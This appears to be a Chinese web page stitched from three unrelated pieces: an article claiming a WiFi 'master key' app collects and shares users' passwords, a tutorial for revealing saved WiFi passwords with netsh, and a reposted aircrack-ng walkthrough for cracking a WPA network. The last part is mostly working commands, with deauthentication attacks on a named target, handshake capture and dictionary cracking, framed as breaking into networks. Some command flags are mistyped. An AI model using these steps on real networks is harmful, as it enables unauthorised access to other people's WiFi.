不知道大家还记不记得“万能钥匙”这种APP。
一开始,小编觉得研究这玩意的简直就是大好人,但现在才知道,它有多坑!
有很多人,由于手机流量不够用了,就会想着通过万能钥匙,破解周围某个WiFi密码。
但是,当软件显示成功破解,可以免费蹭WiFi的时候,却不知道在这背后,你都付出了多大的代价。
其实,很多人都以为万能钥匙可以破解密码,大致都是通过一些组合来测试碰撞的。
所以,才会有一些简单密码的WiFi可以顺利破解。
而一些比较复杂的密码,比如说大写字母+小写字母+数字+符号等等,就无法通过万能钥匙顺利破解。
但实际,却不是这样子的。
接下来,就一起看看这类万能钥匙APP的工作原理。
上面有提到WiFi密码是可以组合的,但是这种组合碰撞破解的方法,却比你想象中难操作。
所以,是的,你没猜错。
万能钥匙,压根就不是通过这种方式,来一键破解WiFi密码,而是通过“窃取”信息的方法来达到破解密码的效果。
简单来说,如果你的手机有安装万能钥匙APP。
那么,当你通过密码连接WiFi的时候,它就会“记住”密码并上传至服务器。
后续,如果有人想通过万能钥匙APP来破解同一个WiFi,它就直接用……
所以,与其说它破解密码,还不如说它“偷密码”,直接汇总周边信息。
如果你发现自己的WiFi被蹭,就很有可能是你或者你的家人的手机的万能钥匙APP,把WiFi密码拿到手了。
ε=(´ο`*)))唉,我是后悔安装了,你呢?
大家好,这期教大家如何破解无线WIFI密码,无线WIFI密码是非常重要的难免会在使用过程中时间久了忘记了WIFI密码是什么,这就导致我们非常的着急。
下面我一步步教会大家如何破解WIFI密码。
1.打开电脑进入到系统,然后按下快捷键(WIN+R)组合键,打开运行窗口,输入CMD命令,如下图所示:
2.按确定按钮或者直接回车键,跳出cmd命令窗口,如下图所示:
3.在命令行中输入netsh,进入到网络命令窗口,然后输入wlan show profiles,如下图所示:
4.如上图,在用户配置文件里面,我们可以看到目前我们所连接过的所有无线网的名称,这些无线网的密码我们都可以找到。具体应该怎么操作呢?
5.接下来,我们只需要在netsh>这一栏,输入wlan show profile wifi名称 key=clear 回车(这里的wifi名称为 Tenda_1F) 这样就可以在“关键内容”后看到wifi密码了,如下图所示:
6.红框中线上的安全密钥即为这个WIFI的密码123456789。同理,其他WIFI密码同样是如此输入命令即可完成。
往期精彩回顾↓↓↓
电脑还不会重装系统?3种简单方法总有一种适合你
电脑启动慢?玩游戏卡?4步优化技巧,让你的电脑性能发挥到极致
路由器为什么越用越卡?一招教你破解
前言
最近整理了一些奇安信&华为&深信服大佬的课件资料+大厂面试课题,想要的可以私信自取,无偿赠送给粉丝朋友~
一、什么是Aircrack-ngAircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站)并嗅探802.11a,802.11b,802.11g的数据。该程序可运行在Linux和Windows上。Linux版本已经被移植到了Zaurus和Maemo系统平台, 并概念验证可移植到iPhone。
运行环境使用Kali 2021.3进行演示操作软件:aircrack-ng(Kali系统内置)外置无线网卡设备: 要支持监听,支持Linux并且免驱(我这里使用的是RT3070)
插入网卡设备进入Kali系统之后插入自己的网卡右键查看网卡是否连接到Kali二、破解流程1.进入管理员模式命令: sudo su解释: 不在管理员模式下运行可能会有权限不够的提示
提示:执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可
2.查看网卡信息命令: iwconfig/ifconfig解释: iwconfig查看网卡的信息、ifconfig查看新连接的设备wlan0就是我们的无线网卡
3.杀掉冲突进程命令: airmon-ng check kill解释: 杀死进程可以让搜索更准确,不会受到影响
4.查看网卡是否支持监听模式命令: airmon-ng出现你的网卡信息就说明你的网卡支持监听
5.开启无线网卡监听模式命令: airmon-ng start wlan0解释: start开启哪个接口 wlan0是接口的名字
再用iwconfig查看一下网卡信息,wlan0后面多了个mon,wlan0mon就说明已经开启监听了
5.获取附近的AP信息(搜WIFI)命令: airodump-ng wlan0mon解释: BSSID:WIFI的MAC地址、PWR:信号强度(值越小信号强度强)、Data:监听期间流量总合、CH:信道、ENC:加密算法、ESSID:WIFI名称
提示:找到网络之后CTRL+Z结束搜索就可以
6.开始抓取握手包并保存成文件命令: airodump-ng -c (频道号) --bssid (MAC地址) -w (抓取的数据包的保存位置) wlan0mon解释:
1.c:信道
2.bssid:BSSID值
3.w:捕获的握手包要保存到的路径
我要破解的目标网络是Test,CH(信道)是11,MAC地址是E2:D4:64:02:73:A8,我在根目录下创建了一个名为1的文件夹输入命令: airodump-ng -c 11 --bssid E2:D4:64:02:73:A8 -w 1/ wlan0mon
提示:所有的数值都要写刚刚查到要破解的WIFI其中一个客户端的值
(1) 等待新的设备连接WIFI当新的客户端连接时,客户端输入密码连接就可以抓到握手包,右上角出现WPA时就表示已经抓到了对方的握手包
(2) 主动攻击命令: aireplay-ng -o 2 -a BSSID(MAC地址) -c STATION wlan0mon解释:
0 :对客户端表示发起攻击,让设备断开连接
2:表示攻击次数,0表示一直攻击
a :指定无线路由器BSSID
c :指定强制断开的设备MAC
执行命令aireplay-ng -o 2 -a E2:D4:64:02:73:A8 -c C8:94:02:6D:93:F3 wlan0mon捕捉到握手包时就停止攻击
注意:执行主动攻击的时候新建一个终端执行命令,原来的抓包终端不要结束
6. 破解握手包密码命令: aircrack-ng -a2 -b E2:D4:64:02:73:A8 -w 字典.txt 1/-01.cap解释:
a2:WPA的握手包
b :破解的WIFI的BSSID
w :指定字典文件
* :.cap是抓取到握手包的数据包文件
最后就是等待跑字典了,下面就是破解的WIFI密码,密码是20041101
7.关闭监听模式命令: airmon-ng stop wlan0mon在监听模式下,kali不能连接网络
三、总结1.问题插入网卡,如果查看不到网卡信息,可以点开连接WIFI看一下能否搜索到附近的网络,如果不行那就右键系统可移动设备-把网卡断开再重新连接一下
2.密码字典插入网卡,打开网卡的监听模式,搜索附近的WIFI,获取握手包,最后跑字典破解握手包,这里给大家提供一个常用的密码字典
链接: /d/file/gt/2023-10/0v5xapqd3r5 gg7y
版权声明:本文为CSDN博主「HonkerG」的原创文章
原文链接:https://blog.csdn/RFZ_322/article/details/123344248